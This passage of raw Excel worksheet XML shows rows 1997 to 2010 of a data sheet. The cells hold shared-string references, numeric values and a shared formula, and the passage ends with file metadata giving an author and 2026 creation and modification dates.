      <c r="E1997">
        <v>23.604715347290039</v>
      </c>
      <c r="F1997">
        <v>1</v>
      </c>
    </row>
    <row r="1998" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1998" t="s">
        <v>3853</v>
      </c>
      <c r="B1998" t="s">
        <v>3854</v>
      </c>
      <c r="C1998">
        <f t="shared" si="31"/>
        <v>11932429</v>
      </c>
      <c r="D1998" t="s">
        <v>3856</v>
      </c>
      <c r="E1998">
        <v>0.62822788953781128</v>
      </c>
      <c r="F1998">
        <v>2</v>
      </c>
    </row>
    <row r="1999" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1999" t="s">
        <v>3857</v>
      </c>
      <c r="B1999" t="s">
        <v>3858</v>
      </c>
      <c r="C1999">
        <f t="shared" si="31"/>
        <v>11933682</v>
      </c>
      <c r="D1999" t="s">
        <v>3859</v>
      </c>
      <c r="E1999">
        <v>15.07476902008057</v>
      </c>
      <c r="F1999">
        <v>1</v>
      </c>
    </row>
    <row r="2000" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2000" t="s">
        <v>3857</v>
      </c>
      <c r="B2000" t="s">
        <v>3858</v>
      </c>
      <c r="C2000">
        <f t="shared" si="31"/>
        <v>11934935</v>
      </c>
      <c r="D2000" t="s">
        <v>3860</v>
      </c>
      <c r="E2000">
        <v>10.730373382568359</v>
      </c>
      <c r="F2000">
        <v>2</v>
      </c>
    </row>
    <row r="2001" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2001" t="s">
        <v>3861</v>
      </c>
      <c r="B2001" t="s">
        <v>1289</v>
      </c>
      <c r="C2001">
        <f t="shared" si="31"/>
        <v>11936188</v>
      </c>
      <c r="D2001" t="s">
        <v>794</v>
      </c>
      <c r="E2001">
        <v>23.436929702758789</v>
      </c>
      <c r="F2001">
        <v>1</v>
      </c>
    </row>
    <row r="2002" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2002" t="s">
        <v>3861</v>
      </c>
      <c r="B2002" t="s">
        <v>1289</v>
      </c>
      <c r="C2002">
        <f t="shared" si="31"/>
        <v>11937441</v>
      </c>
      <c r="D2002" t="s">
        <v>3862</v>
      </c>
      <c r="E2002">
        <v>6.8285384178161621</v>
      </c>
      <c r="F2002">
        <v>2</v>
      </c>
    </row>
    <row r="2003" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2003" t="s">
        <v>3863</v>
      </c>
      <c r="B2003" t="s">
        <v>3864</v>
      </c>
      <c r="C2003">
        <f t="shared" si="31"/>
        <v>11938694</v>
      </c>
      <c r="D2003" t="s">
        <v>3865</v>
      </c>
      <c r="E2003">
        <v>34.409542083740227</v>
      </c>
      <c r="F2003">
        <v>1</v>
      </c>
    </row>
    <row r="2004" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2004" t="s">
        <v>3863</v>
      </c>
      <c r="B2004" t="s">
        <v>3864</v>
      </c>
      <c r="C2004">
        <f t="shared" si="31"/>
        <v>11939947</v>
      </c>
      <c r="D2004" t="s">
        <v>3866</v>
      </c>
      <c r="E2004">
        <v>6.2020879704505205E-4</v>
      </c>
      <c r="F2004">
        <v>2</v>
      </c>
    </row>
    <row r="2005" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2005" t="s">
        <v>3867</v>
      </c>
      <c r="B2005" t="s">
        <v>3868</v>
      </c>
      <c r="C2005">
        <f t="shared" si="31"/>
        <v>11941200</v>
      </c>
      <c r="D2005" t="s">
        <v>3869</v>
      </c>
      <c r="E2005">
        <v>33.096591949462891</v>
      </c>
      <c r="F2005">
        <v>1</v>
      </c>
    </row>
    <row r="2006" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2006" t="s">
        <v>3867</v>
      </c>
      <c r="B2006" t="s">
        <v>3868</v>
      </c>
      <c r="C2006">
        <f t="shared" si="31"/>
        <v>11942453</v>
      </c>
      <c r="D2006" t="s">
        <v>3870</v>
      </c>
      <c r="E2006">
        <v>17.463254928588871</v>
      </c>
      <c r="F2006">
        <v>2</v>
      </c>
    </row>
    <row r="2007" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2007" t="s">
        <v>3871</v>
      </c>
      <c r="B2007" t="s">
        <v>3872</v>
      </c>
      <c r="C2007">
        <f t="shared" si="31"/>
        <v>11943706</v>
      </c>
      <c r="D2007" t="s">
        <v>3873</v>
      </c>
      <c r="E2007">
        <v>26.160215377807621</v>
      </c>
      <c r="F2007">
        <v>1</v>
      </c>
    </row>
    <row r="2008" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2008" t="s">
        <v>3871</v>
      </c>
      <c r="B2008" t="s">
        <v>3872</v>
      </c>
      <c r="C2008">
        <f t="shared" si="31"/>
        <v>11944959</v>
      </c>
      <c r="D2008" t="s">
        <v>3874</v>
      </c>
      <c r="E2008">
        <v>2.9478683471679692</v>
      </c>
      <c r="F2008">
        <v>2</v>
      </c>
    </row>
    <row r="2009" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2009" t="s">
        <v>3875</v>
      </c>
      <c r="B2009" t="s">
        <v>3876</v>
      </c>
      <c r="C2009">
        <f t="shared" si="31"/>
        <v>11946212</v>
      </c>
      <c r="D2009" t="s">
        <v>3877</v>
      </c>
      <c r="E2009">
        <v>27.5352783203125</v>
      </c>
      <c r="F2009">
        <v>1</v>
      </c>
    </row>
    <row r="2010" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2010" t="s">
        <v>3875</v>
      </c>
      <c r="B2010" t="s">
        <v>3876</v>
      </c>
      <c r="C2010">
        <f t="shared" si="31"/>
        <v>11947465</v>
      </c>
      <c r="D2010" t="s">
        <v>3878</v>
      </c>
      <c r="E2010">
        <v>3.0032370705157518E-4</v>
      </c>
      <c r="F2010">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Jean de Dieu MUSENGAMANA</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-28T13:26:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-20T04:46:42Z</dcterms:modified>
</cp:coreProperties>
</file>